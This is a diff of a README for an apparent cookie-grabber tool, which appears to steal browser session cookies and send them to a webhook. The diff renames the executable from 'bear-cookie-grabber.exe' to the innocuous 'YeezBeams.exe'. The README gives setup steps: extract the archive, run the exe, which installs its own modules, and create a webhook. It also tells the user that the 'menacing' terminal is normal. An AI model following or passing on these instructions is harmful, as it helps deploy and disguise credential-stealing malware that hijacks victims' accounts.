sumg231/bear-cookie-grabber/README.md

 Once you've downloaded the files extract the folder so it's no longer a .zip file.
 ```

-### 2. Open The bear-cookie-grabber.exe File:
+### 2. Open The YeezBeams.exe File:

 ```
 You dont need to install any modules opening this will install them for you.
-Then you can open the bear-cookie-grabber.exe which will open a terminal with the bear-cookie-grabber logo.
+Then you can open the YeezBeams which will open a terminal with the YeezBeams logo.
 Don't worry although this looks quite menacing its just aesthetic and is normal.
 ```

 ### 3. Create A Webhook: